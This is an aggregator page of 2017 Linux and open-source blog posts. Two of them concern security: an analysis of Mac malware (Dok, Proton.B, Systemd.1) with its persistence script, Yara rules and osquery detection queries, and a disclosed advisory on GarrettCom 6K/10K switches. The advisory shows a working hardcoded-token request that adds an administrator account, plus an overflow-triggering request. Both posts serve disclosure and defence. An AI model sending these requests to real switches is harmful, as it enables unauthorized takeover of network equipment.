The purpose of this is two-fold. First, the old repo got quite messy, and Debian people (rightfully!) keep reminding us about it, but it would be difficult to do a gradual cleanup. Second, since the CI server has moved, and so did the build hosts, we need to test how well the new procedures are working. And, additionally, it should tell us if we are prepared to restore VyOS from its source should anything happen to the server or its contents.

For perhaps a couple of days, there will be no new nightly builds, and you will not be able to build ISOs yourself, unless you change the repo path in ./configure options by hand. Stay tuned.

20 May, 2017 12:38PM by Daniil Baturin

May 19, 2017

hackergotchi for Ubuntu developers

Ubuntu developers

Nish Aravamudan: usd has been renamed to git-ubuntu

After some internal bikeshedding, we decided to rework the tooling that the Server Team has been working on for git-based source package management. The old tool was usd (Ubuntu Server Dev), as it stemmed from a Canonical Server sprint in Barcelona last year. That name is confusing (acronyms that aren’t obvious are never good) and really the tooling had evolved to be a git wrapper.

So, we renamed everything to be git-ubuntu. Since git is awesome, that means git ubuntu also works as long as git-ubuntu is in your $PATH. The snap (previously usd-nacc) has been deprecated in favor of git-ubuntu (it still exists, but if you try to run, e.g., usd-nacc.usd you are told to install the git-ubuntu snap). To get it, use:

sudo snap install --classic git-ubuntu

We are working on some relatively big changes to the code-base to release next week:

  1. Empty directory support (LP: #1687057). My colleague Robie Basak implemented a workaround for upstream git not being able to represent empty directories.
  2. Standardizing (internal to the code) how the remote(s) work and what refspecs are used to fetch from them.

Along with those architectural changes, one big functional shift is to using git-config to store some metadata about the user (specifically, the Launchpad user name to use, in ~/.gitconfig) and the command used to create the repository (specifically, the source package name, in <dir>/.git/config). I think this actually ends up being quite clean from an end-user perspective, and it means our APIs and commands are easier to use, as we can just lookup this information from git-config when using an existing repository.

As always, the latest code is at:

19 May, 2017 10:45PM

Ubuntu Insights: Visual Studio Code is now available as a snap on Ubuntu

There is a new desktop snap in the Snap store: Visual Studio Code.

A versatile and open source code editor

Launched in 2015 by Microsoft, Visual Studio Code has imposed itself as one of the preferred code editors in the developer community. Cross-platform (powered by Electron), it features a marketplace of more than 3000 extensions where any language can find its linters, debuggers and test runners.

To install Visual Studio Code as a snap:

sudo snap install --classic vscode

How has VS Code made such a splash in the development world?

After barely two years, this editor has found a place in a lot of tool belts, on Linux too. To explain this success, here are some notable highlights:

  • smart completion based on types and functions
  • a versatile integrated debugger
  • git built-in support with an approachable user interface for git commands
  • and of course, extensions support

Git integration in Visual Studio Code features delightful commit (and reverts!) management.

To make the experience more familiar, you can emulate keyboard shortcuts of other editors by installing alternative keymaps, such as Vim, Emacs, Sublime, etc.

Available as a snap for an agile release process

It’s not the first code editor featured in this Electron snaps blog series, and if you have been reading the other entries, you already know why snaps are a good fit for Electron distribution on Linux: auto-updates, ease of installation and dependency bundling.

This snap makes the latest version of Visual Studio Code easily installable and auto-updatable on Ubuntu 14.04, 16.04 and newer supported releases, goodbye 3rd party PPAs and general package hunting!

Releases for everyone and releases for testers

Snaps allow developers to release software in different “channels”, that users subscribe to (defaulting to the stable channel), in order to receive automated updates.

Four channels are available, with names hinting at the stability users can expect:

  • edge is for QA, testers and adventurous adopters
  • beta is where versions from the edge channel are moved to when they pass some level of testing and QA
  • candidate is commonly used for freezed pre-release versions
  • stable is what users install by default (the snap install <snap name> command without any options) and is expected to only contain stable software. This is also the channel that enables snaps to appear in search results of the snap find command.

For a primer on using the snap command-line, this tutorial will show you the way.

19 May, 2017 07:03PM by Ubuntu Insights (

hackergotchi for AlienVault OSSIM

AlienVault OSSIM

Diversity in Recent Mac Malware

In recent weeks, there have been some high-profile reports about Mac malware, most notably OSX/Dok and OSX.Proton.B. Dok malware made headlines due to its unique ability to intercept all web traffic, while Proton.B gained fame when attackers replaced legitimate versions of HandBrake with an infected version on the vendor’s download site. Another lower profile piece of Mac malware making the rounds is Mac.Backdoor.Systemd.1.

Figure 1: Systemd pretending to be corrupted and un-runnable.

There have been no public reports as to who is behind these attacks and only little information about their targets. OSX/Dok is reported to have targeted European victims, while users of HandBrake were the victims of Proton.B. One corporate victim of Proton.B was Panic, Inc. which had its source code stolen and received a ransom demand from the attackers.

Each of these malware variants is designed to take advantage of Macs, but analysis shows that they are actually drastically different from each other, showing just how diverse the Mac malware space has grown. Let’s dive into some of the technical details (but not too technical ;)  of each piece of malware to learn more about what they do and how they work.

  OSX/Dok OSX.Proton.B Mac.BackDoor.System.1

HTTP(S) proxy

Credential theft (potentially other RAT functionality)



Objective-C (with heavy use of shell commands)

Objective-C (with heavy use of shell commands)

C++ (with a handful of shell commands)


Launch Agent

Launch Agent

Launch Agent

Launch Daemon

Startup Item

Uses chflags to make files read-only

Phishing emails

Compromised software download

(presumably) Phishing



Anti-debugger (PT_DENY_ATTACH)

Closes Terminal and Wireshark Windows

Binary Obfuscation

Newer variants are packed with UPX

Password protected zip archive

Encrypted configuration file

Encrypted configuration file

XOR encrypted strings in binary
Detection Avoidance

Signed App bundle

Installs trusted root certificate

Modifies sudo settings to prevent prompting

Checks for security software

Infected legitimate software

Use of “hidden” dot files

Uses chflags to hide files from UI

Use of “hidden” dot files

MiTM proxy (no separate C2)


Custom 3DES


Dok is very basic in its functionality – it reconfigures a system to proxy web traffic through a malicious host. It does this by installing Tor and changing web proxy settings to hijack web traffic in order to steal credentials or even alter content. There is no need for the victim to communicate with a command and control server since the malicious proxy server already has access to the information its trying to steal.

Proton.B might be a slimmed down version of Proton.A which contains a full-featured suite of RAT functionalities. However, while Proton.B is reported to have only basic credential stealing capabilities, it does have the capability to run arbitrary commands from its configuration file. The decrypted configuration file also shows hints of other capabilities, such as grabbing screenshots and SSH tunneling. Proton.B is also able to steal credentials by collecting them from keychains, password vaults, and web browsers. The credentials are then exfiltrated over HTTPS.

Systemd.1 is a basic backdoor/RAT that waits for commands from a command and control server. This backdoor is able to either listen on a network socket for an incoming C&C connection or make its own connection to a C&C. Commands from the C&C allow attackers to do things like: run arbitrary commands, perform file system operations, update the backdoor software, update the C&C server, and install plugins.

Language and Distribution

Windows malware often comes in a variety of formats – ranging from office documents, script files, executables, or malicious PDFs just to name a few. In contrast, Mac malware tends to have much less variation and most often shows up as a Mach-O executable, zipped app bundle, or DMG file. There has been a recent case of malicious Office documents targeting Macs and back in 2012 AlienVault also reported on Office documents targeting Macs, but those are exceptions to the norm.

Dok is distributed as a zipped app bundle written in Objective-C, but also uses a shell script to perform critical functionality. The zipped app bundle is typically sent as an attachment to a phishing email and requires the victim to execute the application.

Proton.B is also written in Objective-C, but the malicious code is distributed with the popular video transcoding tool HandBrake. Proton.B uses HandBrake to bootstrap loading of its own code and tricks victims into entering in their password by presenting a fake authentication prompt.

Systemd.1 is different from Dok and Proton in that it is written in C++. We’re not sure of its initial infection vector, but we can posit that it is via phishing since the samples[1] in VirusTotal are often named “Confidential_Data”. It is possible that the Systemd.1 Mach-O is distributed along with an app bundle, but we have not discovered that link yet. (As a side note, we’ve previously looked at another piece of C++ Mac malware, OceanLotus, and Systemd.1 does some similar things like decrypting XOR encrypted strings in __mod_init, however, Systemd.1 has fewer features.)

Figure 2. Systemd XOR decrypting strings


Even though there are several ways that malware can persist on Macs, we find that most choose to use launch agents and launch daemons. Here, Dok and Proton use launch agents while Systemd.1 uses both agent and daemon. To make things extra sticky, Systemd.1 also uses the deprecated Startup Items feature in OSX and drops files in /Library/StartItems.

/Library/StartupItems/sysetmd/StartupParameters.plist will contain the following text


Description = "Start systemd";

Provides = ("system");

Requires = ("Network");

OrderPreference = "None";


And /Library/StartupItems/sysetmd/sysetmd will look like:


. /etc/rc.common

StartService (){

ConsoleMessage "Start system Service"

/Library/sysetmd d


StopService (){

return 0


RestartService (){

return 0


RunService "$1"

Systemd.1 also makes it slightly harder to remove the malware by using the “chflags” command to make files read-only.

Anti-Analysis, Binary Obfuscation and Detection Avoidance

Initial samples of Dok did not have any obfuscation or anti-analysis code, however, newer variants are being packed with UPX. In order to suppress security prompts from the operating system, Dok was cryptographically signed by a valid developer. Furthermore, Dok installs a malicious trusted root certificate so that web browsers won’t alert users that their HTTPS traffic is being intercepted by a proxy.

Figure 3. Dok signed with a legitimate certificate

Proton.B attempts to thwart analysis by preventing debuggers from attaching to it (though this can be easily bypassed). It also kills Terminal and Wireshark processes – both of which would be used by someone who wanted to analyze the malware. As previously mentioned, Proton.B was distributed with a modified version of HandBrake. Modified versions extract the core Proton.B binary from a password protected (encrypted) zip file. Although the Proton.B executable itself is not obfuscated, its configuration file is encrypted. Once executed, Proton.B checks for the presence of popular security software Little Snitch, Radio Silence and HandsOff – if present, it stops running. Popular in *nix-based malware, Proton.B also uses “hidden” dot files to make it harder to see.

Systemd.1 does not have any anti-debugging measures, but does XOR encrypt several strings in the binary. These strings are decrypted at runtime along with a 3DES encrypted configuration file. Systemd.1 also uses hidden dot files and directories, but goes one step further and hides files with the “chflags hidden” command.


As you can see, these three pieces of malware are distinct from each other in their approaches and illustrate the diversity of Mac malware variants that have surfaced in just the past few weeks. One can only expect the diversity to increase in the future. In particular, we’d expect future Mac malware to utilize more anti-analysis and obfuscation techniques since there is a lot of low hanging fruit on that front.

If you want to find out more about these malware variants, here are some of the pulses we have in our Open Threat Exchange (OTX):


There are many ways to detect the presence of these and other Mac-based malware variants in your environment. We’ve included some of those methods.

Yara rules

You can use the rules below in any system that supports Yara to detect these Mac-based malware variants.

rule mac_bd_systemd



author = "AlienVault Labs"

type = "malware"

description = "OSX/Proton.B"


$c1 = "This file is corrupted and connot be opened"

$c2 = ""

$c3 = ";chflags hidden"

$c4 = "%keymod%"

$c5 = "* *-<4=w"


3 of ($c*)


rule osx_proton_b



author = "AlienVault Labs"

type = "malware"

description = "Mac.Backdoor.Systemd.1"


$c1 = "%@/%@%@%@%@%@"

$c2 = { 2e 00 68 00 61 00 73 00 } //. h a s

$c3 = "Network Configuration needs to update DHCP settings. Type your password to allow this."

$c4 = "root_password"

$c5 = "decryptData:withPassword:error:"

$c6 = "-----BEGIN PUBLIC KEY-----"

$c7 = "ssh_user"


5 of ($c*)


rule osx_dok




author = "AlienVault Labs"

type = "malware"

description = "OSX/Dok"


$c1 = "/usr/local/bin/brew"

$c2 = "/usr/local/bin/tor"

$c3 = "/usr/local/bin/socat"

$c4 = "killall Safari"

& $c5 = "killall \"Google Chrome\""

$c6 = "killall firefox"

$c7 = "security add-trusted-cert -d -r trustRoot -k /Library/Keychains/System.keychain %@"


all of them



The osquery project already has some rules for Dok and Proton which you can find here:

For Systemd, you can add the following queries:


"platform": "darwin",

"version": "1.4.5",

"queries": {

"Systemd_Files": {

"query" : "select * from file \

where path like '/Library/StartupItems/sysetmd/StartupParameters.plist' OR \

path like '/Library/StartupItems/sysetmd/sysetmd' OR \

path like '/Library/sysetmd' OR \

& path like '/Users/%/Library/sysetmd' OR \

path like '/private/tmp/.systemd/systemd.lock%' OR \

path like '/private/var/root/.local/.systemd/systemd.uniq%';",

"interval" : "3600",

"description" : "Mac.BackDoor.Systemd",

& "value" : "Artifacts created by this malware"


"Systemd_Launch": {

"query" : "select * from launchd where name like '';",

"interval" : "3600",

"description" : "SystemD Launch Agent/Daemon",

"value" : "Artifact used by this malware"





Hashes for Mac.Backdoor.Systemd.1:

6b379289033c4a17a0233e874003a843cd3c812403378af68ad4c16fe0d9b9c4 37152cfcfb9b33531696624d8d345feb894b5b4edd8af2c63a71e91072abe1ad c549c83577c294cc1323ca94e848389fce25510647ec5212fa2276de081771ca 3f71b6b994eabbc32a63eac14e9abd7b6cd26c37ed0baacbfbe62032c5930a40

19 May, 2017 07:00PM

hackergotchi for Ubuntu developers

Ubuntu developers

José Antonio Rey: Social Media Management vs. Community Management?

I personally stopped blogging a while ago, but I kinda feel this is a necessary blog post. A while ago, a professor used the term Community Manager interchangeably with Social Media Manager. I made a quick comment about them not being the same, and later some friends started questioning my reasoning.

Last week during OSCON, I was chatting with a friend about this same topic. A startup asked me to help them as a community manager about a year ago. I gladly accepted, but then they just started assigning me social media work.

And these are not the only cases. I have seen several people use both terms interchangeably, which they are not. I guess it’s time for me to burst the bubble that has been wrapped around both terms.

In order to do that, let’s explain, in very simple words, the job of both of them. Let’s start with the social media managers. Their job is, as the title says, to manage social media channels. Post on Facebook, respond to Twitter replies, make sure people feel welcome when they visit any of the social media channels, and automatically represent the brand/product through social media.

Community managers, on the other side, focus on building communities around a product or service. To put it simpler, they make sure that there’s people that care about the product, that contribute to the ecosystem, that work with the provider to make it better. Social media management is a part of their job. It is a core function, because it is one of the channels that allow them to communicate with people to hear their concerns and project the provider’s voice about the product. However, it is not their only job. They also have to go out and meet with people, in real life. Talk with higher-ups to voice the concerns. Hear how the product is impacting people’s life in order to make a change, or continue on the same good path.

With this, I’m not trying to devalue the work of social media managers. On the other hand, they are have a very valuable job. Imagine all those companies with social media profiles, without the funny comments. No message replies if you had a question. Horrible, right? Managing these channels is as important, so brands/products are ‘alive’ on the interwebs. Being a community manager is not only managing a channel. Therefore, they are not comparable jobs.

Each of the positions is different, even though they complement each other pretty well. But I hope that with this post you can understand a little bit more about the inside job of both community managers and social media managers. In a fast-paced world like ours today, these two can make a huge difference between having a presence online, or not. So, next time, if you’re looking for a community manager, don’t expect them to do only social media work. And viceversa – if you’re looking for a social media manager, don’t expect them to build community out of social media.

19 May, 2017 05:02PM

Martin Pitt: Cockpit is now in Ubuntu backports

Hot on the heels of landing Cockpit in Debian unstable and Ubuntu 17.04, the Ubuntu backport request got approved (thanks Iain!), which means that installing cockpit on Ubuntu 16.04 LTS or 16.10 is now also a simple apt install cockpit away. I updated the installation instructions accordingly.

Enjoy, and let us know about problems!

19 May, 2017 02:49PM

hackergotchi for Grml developers

Grml developers

Michael Prokop: Debian stretch: changes in util-linux #newinstretch

We’re coming closer to the Debian/stretch stable release and similar to what we had with #newinwheezy and #newinjessie it’s time for #newinstretch!

Hideki Yamane already started the game by blogging about GitHub’s Icon font, fonts-octicons and Arturo Borrero Gonzalez wrote a nice article about nftables in Debian/stretch.

One package that isn’t new but its tools are used by many of us is util-linux, providing many essential system utilities. We have util-linux v2.25.2 in Debian/jessie and in Debian/stretch there will be util-linux >=v2.29.2. There are many new options available and we also have a few new tools available.

Tools that have been taken over from other packages

  • last: used to be shipped via sysvinit-utils in Debian/jessie
  • lastb: used to be shipped via sysvinit-utils in Debian/jessie
  • mesg: used to be shipped via sysvinit-utils in Debian/jessie
  • mountpoint: used to be shipped via initscripts in Debian/jessie
  • sulogin: used to be shipped via sysvinit-utils in Debian/jessie

New tools

  • lsipc: show information on IPC facilities, e.g.:
  • root@ff2713f55b36:/# lsipc
    RESOURCE DESCRIPTION                                              LIMIT USED  USE%
    MSGMNI   Number of message queues                                 32000    0 0.00%
    MSGMAX   Max size of message (bytes)                               8192    -     -
    MSGMNB   Default max size of queue (bytes)                        16384    -     -
    SHMMNI   Shared memory segments                                    4096    0 0.00%
    SHMALL   Shared memory pages                       18446744073692774399    0 0.00%
    SHMMAX   Max size of shared memory segment (bytes) 18446744073692774399    -     -
    SHMMIN   Min size of shared memory segment (bytes)                    1    -     -
    SEMMNI   Number of semaphore identifiers                          32000    0 0.00%
    SEMMNS   Total number of semaphores                          1024000000    0 0.00%
    SEMMSL   Max semaphores per semaphore set.                        32000    -     -
    SEMOPM   Max number of operations per semop(2)                      500    -     -
    SEMVMX   Semaphore max value                                      32767    -     -
  • lslogins: display information about known users in the system, e.g.:
  • root@ff2713f55b36:/# lslogins 
        0 root        2        0        1            root
        1 daemon      0        0        1            daemon
        2 bin         0        0        1            bin
        3 sys         0        0        1            sys
        4 sync        0        0        1            sync
        5 games       0        0        1            games
        6 man         0        0        1            man
        7 lp          0        0        1            lp
        8 mail        0        0        1            mail
        9 news        0        0        1            news
       10 uucp        0        0        1            uucp
       13 proxy       0        0        1            proxy
       33 www-data    0        0        1            www-data
       34 backup      0        0        1            backup
       38 list        0        0        1            Mailing List Manager
       39 irc         0        0        1            ircd
       41 gnats       0        0        1            Gnats Bug-Reporting System (admin)
      100 _apt        0        0        1            
    65534 nobody      0        0        1            nobody
  • lsns: list system namespaces, e.g.:
  • root@ff2713f55b36:/# lsns
    4026531835 cgroup      2   1 root bash
    4026531837 user        2   1 root bash
    4026532473 mnt         2   1 root bash
    4026532474 uts         2   1 root bash
    4026532475 ipc         2   1 root bash
    4026532476 pid         2   1 root bash
    4026532478 net         2   1 root bash
  • setpriv: run a program with different privilege settings
  • zramctl: tool to quickly set up zram device parameters, to reset zram devices, and to query the status of used zram devices

New features/options

addpart (show or change the real-time scheduling attributes of a process):

--reload reload prompts on running agetty instances

blkdiscard (discard the content of sectors on a device):

-p, --step <num>    size of the discard iterations within the offset
-z, --zeroout       zero-fill rather than discard

chrt (show or change the real-time scheduling attributes of a process):

-d, --deadline            set policy to SCHED_DEADLINE
-T, --sched-runtime <ns>  runtime parameter for DEADLINE
-P, --sched-period <ns>   period parameter for DEADLINE
-D, --sched-deadline <ns> deadline parameter for DEADLINE

fdformat (do a low-level formatting of a floppy disk):

-f, --from <N>    start at the track N (default 0)
-t, --to <N>      stop at the track N
-r, --repair <N>  try to repair tracks failed during the verification (max N retries)

fdisk (display or manipulate a disk partition table):

-B, --protect-boot            don't erase bootbits when creating a new label
-o, --output <list>           output columns
    --bytes                   print SIZE in bytes rather than in human readable format
-w, --wipe <mode>             wipe signatures (auto, always or never)
-W, --wipe-partitions <mode>  wipe signatures from new partitions (auto, always or never)

New available columns (for -o):

 gpt: Device Start End Sectors Size Type Type-UUID Attrs Name UUID
 dos: Device Start End Sectors Cylinders Size Type Id Attrs Boot End-C/H/S Start-C/H/S
 bsd: Slice Start End Sectors Cylinders Size Type Bsize Cpg Fsize
 sgi: Device Start End Sectors Cylinders Size Type Id Attrs
 sun: Device Start End Sectors Cylinders Size Type Id Flags

findmnt (find a (mounted) filesystem):

-J, --json             use JSON output format
-M, --mountpoint <dir> the mountpoint directory
-x, --verify           verify mount table content (default is fstab)
    --verbose          print more details

flock (manage file locks from shell scripts):

-F, --no-fork            execute command without forking
    --verbose            increase verbosity

getty (open a terminal and set its mode):

--reload               reload prompts on running agetty instances

hwclock (query or set the hardware clock):

--get            read hardware clock and print drift corrected result
--update-drift   update drift factor in /etc/adjtime (requires --set or --systohc)

ldattach (attach a line discipline to a serial line):

-c, --intro-command <string>  intro sent before ldattach
-p, --pause <seconds>         pause between intro and ldattach

logger (enter messages into the system log):

-e, --skip-empty         do not log empty lines when processing files
    --no-act             do everything except the write the log
    --octet-count        use rfc6587 octet counting
-S, --size <size>        maximum size for a single message
    --rfc3164            use the obsolete BSD syslog protocol
    --rfc5424[=<snip>]   use the syslog protocol (the default for remote);
                           <snip> can be notime, or notq, and/or nohost
    --sd-id <id>         rfc5424 structured data ID
    --sd-param <data>    rfc5424 structured data name=value
    --msgid <msgid>      set rfc5424 message id field
    --socket-errors[=<on|off|auto>] print connection errors when using Unix sockets

losetup (set up and control loop devices):

-L, --nooverlap               avoid possible conflict between devices
    --direct-io[=<on|off>]    open backing file with O_DIRECT 
-J, --json                    use JSON --list output format

New available --list column:

DIO  access backing file with direct-io

lsblk (list information about block devices):

-J, --json           use JSON output format

New available columns (for --output):

HOTPLUG  removable or hotplug device (usb, pcmcia, ...)
SUBSYSTEMS  de-duplicated chain of subsystems

lscpu (display information about the CPU architecture):

-y, --physical          print physical instead of logical IDs

New available column:

DRAWER  logical drawer number

lslocks (list local system locks):

-J, --json             use JSON output format
-i, --noinaccessible   ignore locks without read permissions

nsenter (run a program with namespaces of other processes):

-C, --cgroup[=<file>]      enter cgroup namespace
    --preserve-credentials do not touch uids or gids
-Z, --follow-context       set SELinux context according to --target PID

rtcwake (enter a system sleep state until a specified wakeup time):

--date <timestamp>   date time of timestamp to wake
--list-modes         list available modes
-r, --reorder <dev>  fix partitions order (by start offset)

sfdisk (display or manipulate a disk partition table):

New Commands:

-J, --json <dev>                  dump partition table in JSON format
-F, --list-free [<dev> ...]       list unpartitioned free areas of each device
-r, --reorder <dev>               fix partitions order (by start offset)
    --delete <dev> [<part> ...]   delete all or specified partitions
--part-label <dev> <part> [<str>] print or change partition label
--part-type <dev> <part> [<type>] print or change partition type
--part-uuid <dev> <part> [<uuid>] print or change partition uuid
--part-attrs <dev> <part> [<str>] print or change partition attributes

New Options:

-a, --append                   append partitions to existing partition table
-b, --backup                   backup partition table sectors (see -O)
    --bytes                    print SIZE in bytes rather than in human readable format
    --move-data[=<typescript>] move partition data after relocation (requires -N)
    --color[=<when>]           colorize output (auto, always or never)
                               colors are enabled by default
-N, --partno <num>             specify partition number
-n, --no-act                   do everything except write to device
    --no-tell-kernel           do not tell kernel about changes
-O, --backup-file <path>       override default backup file name
-o, --output <list>            output columns
-w, --wipe <mode>              wipe signatures (auto, always or never)
-W, --wipe-partitions <mode>   wipe signatures from new partitions (auto, always or never)
-X, --label <name>             specify label type (dos, gpt, ...)
-Y, --label-nested <name>      specify nested label type (dos, bsd)

Available columns (for -o):

 gpt: Device Start End Sectors Size Type Type-UUID Attrs Name UUID
 dos: Device Start End Sectors Cylinders Size Type Id Attrs Boot End-C/H/S Start-C/H/S
 bsd: Slice Start  End Sectors Cylinders Size Type Bsize Cpg Fsize
 sgi: Device Start End Sectors Cylinders Size Type Id Attrs
 sun: Device Start End Sectors Cylinders Size Type Id Flags

swapon (enable devices and files for paging and swapping):

-o, --options <list>     comma-separated list of swap options

New available columns (for --show):

UUID   swap uuid
LABEL  swap label

unshare (run a program with some namespaces unshared from the parent):

-C, --cgroup[=<file>]                              unshare cgroup namespace
    --propagation slave|shared|private|unchanged   modify mount propagation in mount namespace
-s, --setgroups allow|deny                         control the setgroups syscall in user namespaces

Deprecated / removed options

sfdisk (display or manipulate a disk partition table):

-c, --id                  change or print partition Id
    --change-id           change Id
    --print-id            print Id
-C, --cylinders <number>  set the number of cylinders to use
-H, --heads <number>      set the number of heads to use
-S, --sectors <number>    set the number of sectors to use
-G, --show-pt-geometry    deprecated, alias to --show-geometry
-L, --Linux               deprecated, only for backward compatibility
-u, --unit S              deprecated, only sector unit is supported

19 May, 2017 08:42AM

hackergotchi for Ubuntu developers

Ubuntu developers

David Tomaschik: Belden Garrettcom 6K/10K Switches: Auth Bypasses, Memory Corruption


Vulnerabilities were identified in the Belden GarrettCom 6K and 10KT (Magnum) series network switches. These were discovered during a black box assessment and therefore the vulnerability list should not be considered exhaustive; observations suggest that it is likely that further vulnerabilities exist. It is strongly recommended that GarrettCom undertake a full whitebox security assessment of these switches.

The version under test was indicated as: 4.6.0. Belden Garrettcom released an advisory on 8 May 2017, indicating that issues were fixed in 4.7.7:

This is a local copy of an advisory posted to the Full Disclosure mailing list.

GarrettCom-01 - Authentication Bypass: Hardcoded Web Interface Session Token

Severity: High

The string “GoodKey” can be used in place of a session token for the web interface, allowing a complete bypass to all web interface authentication. The following request/response demonstrates adding a user ‘gibson’ with the password ‘god’ on any GarrettCom 6K or 10K switch.

GET /gc/service.php?a=addUser&uid=gibson&pass=god&type=manager&key=GoodKey HTTP/1.1
Connection: close
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.28 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8

HTTP/1.0 200 OK
Server: GoAhead-Webs
Content-Type: text/html

<?xml version='1.0' encoding='UTF-8'?><data val="users"><changed val="yes" />
<helpfile val="user_accounts.html" />
<user uid="operator" access="Operator" />
<user uid="manager" access="Manager" />
<user uid="gibson" access="Manager" />

GarrettCom-02 - Secrets Accessible to All Users

Severity: High

Unprivileged but authenticated users (“operator” level access) can view the plaintext passwords of all users configured on the system, allowing them to escalate privileges to “manager” level. While the default “show config” masks the passwords, executing “show config saved” includes the plaintext passwords. The value of the “secrets” setting does not affect this.

6K>show config group=user saved
#User Management#
add user=gibson level=2 pass=god

GarrettCom-03 - Stack Based Buffer Overflow in HTTP Server

Severity: High

When rendering the /gc/flash.php page, the server performs URI encoding of the Host header into a fixed-length buffer on the stack. This decoding appears unbounded and can lead to memory corruption, possibly including remote code execution. Sending garbage data appears to hang the webserver thread after responding to the present request. Requests with Host headers longer than 220 characters trigger the observed behavior.

GET /gc/flash.php HTTP/1.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.28 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch, br
Accept-Language: en-US,en;q=0.8

GarrettCom-04 - SSL Keys Shared Across Devices

Severity: Moderate

The SSL certificate on all devices running firmware version 4.6.0 is the same. This issue was previously reported and an advisory released by ICS-CERT. While GarrettCom reported the issue was fixed in 4.5.6, the web server certificate remains static in 4.6.0:

openssl s_client -connect -showcerts
depth=0 C = US, ST = California, L = Fremont, O = Belden, OU = Technical Support, CN =, emailAddress =
verify error:num=18:self signed certificate
verify return:1
depth=0 C = US, ST = California, L = Fremont, O = Belden, OU = Technical Support, CN =, emailAddress =
verify return:1
Certificate chain
0 s:/C=US/ST=California/L=Fremont/O=Belden/OU=Technical Support/CN=
i:/C=US/ST=California/L=Fremont/O=Belden/OU=Technical Support/CN=

Note that Belden Garrettcom has addressed this issue by reinforcing that users of the switches should install their own SSL certificates if they do not want to use the default certificate and key.

GarrettCom-05 - Weak SSL Ciphers Enabled

Severity: Moderate

Many of the SSL ciphers available for the switch are outdated or use insecure ciphers or hashes.  Additionally, no key exchanges with perfect forward secrecy are offered, rendering all previous communications possibly compromised, given the issue reported above.  Particularly of note is the use of 56-bit DES, RC4, and MD5-based MACs.

ssl3: AES256-SHA
ssl3: DES-CBC3-SHA
ssl3: AES128-SHA
ssl3: SEED-SHA
ssl3: RC4-SHA
ssl3: RC4-MD5
tls1: AES256-SHA
tls1: DES-CBC3-SHA
tls1: AES128-SHA
tls1: SEED-SHA
tls1: RC4-SHA
tls1: RC4-MD5
tls1_1: AES256-SHA
tls1_1: CAMELLIA256-SHA
tls1_1: DES-CBC3-SHA
tls1_1: AES128-SHA
tls1_1: SEED-SHA
tls1_1: CAMELLIA128-SHA
tls1_1: RC4-SHA
tls1_1: RC4-MD5
tls1_1: DES-CBC-SHA
tls1_2: AES256-GCM-SHA384
tls1_2: AES256-SHA256
tls1_2: AES256-SHA
tls1_2: CAMELLIA256-SHA
tls1_2: DES-CBC3-SHA
tls1_2: AES128-GCM-SHA256
tls1_2: AES128-SHA256
tls1_2: AES128-SHA
tls1_2: SEED-SHA
tls1_2: CAMELLIA128-SHA
tls1_2: RC4-SHA
tls1_2: RC4-MD5
tls1_2: DES-CBC-SHA

GarrettCom-06 - Weak HTTP session key generation

Severity: Moderate

The HTTP session key generation is predictable due to the lack of randomness in the generation process. The key is generated by hashing the previous hash result with the current time unit with precision around 50 unit per second. The previous hash is replaced with a fixed salt for the first hash generation.

The vulnerability allows an attacker to predict the first key that’s generated by the switch if he has some knowledge about when the key was generated. Alternatively, the vulnerability also enables privilege escalation attacks which predict all future keys by observing two consecutive key generations of lower privileges.


  • 2017/01/?? - Issues Discovered
  • 2017/01/27 - Reported to
  • 2017/04/27 - 90 day timeline expires, Belden reports patched release forthcoming.
  • 2017/05/08 - Belden releases update & advisory.
  • 2017/05/15 - Disclosure published


These issues were discovered by Andrew Griffiths, David Tomaschik, and Xiaoran Wang of the Google Security Assessments Team.

19 May, 2017 07:00AM

Jono Bacon: Google Home: An Insight Into a 4-Year-Old’s Mind

Recently I got a Google Home (thanks to Google for the kind gift). Last week I recorded a quick video of me interrogating it:

Well, tonight I nipped upstairs quickly to go and grab something and as I came back downstairs I heard Jack, our vivacious 4-year-old asking it questions, seemingly not expecting daddy to be listening.

This is when I discovered the wild curiosity in a 4-year-old’s mind. It included such size and weight questions as…

OK Google, how big is the biggest teddy bear?


OK Google, how much does my foot weigh?

…to curiosities about physics…

OK Google, can chickens fly faster than space rockets?

…to queries about his family…

OK Google, is daddy a mommy?

…and while asking this question he interrupted Google’s denial of an answer with…

OK Google, has daddy eaten a giant football?

Jack then switched gears a little bit, out of likely frustration that Google seemed to “not have an answer for that yet” to all of his questions, and figured the more confusing the question, the more likely that talking thing in the kitchen would work:

OK Google, does a guitar make a hggghghghgghgghggghghg sound?

Google was predictably stumped with the answer. So, in classic Jack fashion, the retort was:

OK Google, banana peel.

While this may seem random, it isn’t:

I would love to see the world through his eyes, it must be glorious.

The post Google Home: An Insight Into a 4-Year-Old’s Mind appeared first on Jono Bacon.

19 May, 2017 03:27AM

Benjamin Mako Hill: Children’s Perspectives on Critical Data Literacies

Last week, we presented a new paper that describes how children are thinking through some of the implications of new forms of data collection and analysis. The presentation was given at the ACM CHI conference in Denver last week and the paper is open access and online.

Over the last couple years, we’ve worked on a large project to support children in doing — and not just learning about — data science. We built a system, Scratch Community Blocks, that allows the 18 million users of the Scratch online community to write their own computer programs — in Scratch of course — to analyze data about their own learning and social interactions. An example of one of those programs to find how many of one’s follower in Scratch are not from the United States is shown below.

Last year, we deployed Scratch Community Blocks to 2,500 active Scratch users who, over a period of several months, used the system to create more than 1,600 projects.

As children used the system, Samantha Hautea, a student in UW’s Communication Leadership program, led a group of us in an online ethnography. We visited the projects children were creating and sharing. We followed the forums where users discussed the blocks. We read comment threads left on projects. We combined Samantha’s detailed field notes with the text of comments and forum posts, with ethnographic interviews of several users, and with notes from two in-person workshops. We used a technique called grounded theory to analyze these data.

What we found surprised us. We expected children to reflect on being challenged by — and hopefully overcoming — the technical parts of doing data science. Although we certainly saw this happen, what emerged much more strongly from our analysis was detailed discussion among children about the social implications of data collection and analysis.

In our analysis, we grouped children’s comments into five major themes that represented what we called “critical data literacies.” These literacies reflect things that children felt were important implications of social media data collection and analysis.

